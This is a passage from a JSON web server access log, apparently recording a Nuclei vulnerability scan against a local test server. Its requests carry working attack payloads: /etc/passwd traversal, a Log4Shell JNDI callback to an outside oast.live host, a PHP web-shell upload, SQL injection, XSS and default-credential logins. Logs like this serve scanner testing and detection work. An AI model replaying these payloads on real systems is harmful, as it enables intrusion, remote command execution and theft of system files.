HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/35 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.ca28fg0smpvbd3qg07h0xpw8gqatnoyhi.oast.live/a%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug/pyspidervulntest/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2229KD1wT6ILvtmLt3J9Hs54U00lS.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/36 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'29KD1z8ZZX7IthCqnyz8CoPaa0r'); INSERT INTO extra_field_options(option_value) VALUES ('29KD1z8ZZX7IthCqnyz8CoPaa0r'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '29KD1z8ZZX7IthCqnyz8CoPaa0r', 16,0) ON DUPLICATE KEY UPDATE tag='29KD1z8ZZX7IthCqnyz8CoPaa0r', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD1wT6ILvtmLt3J9Hs54U00lS.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F29KD1w83NQIL3dWfbFK3pZZaKd6.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"username=admin&password=ixcache","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/37 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/empty/search/results?limit=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// 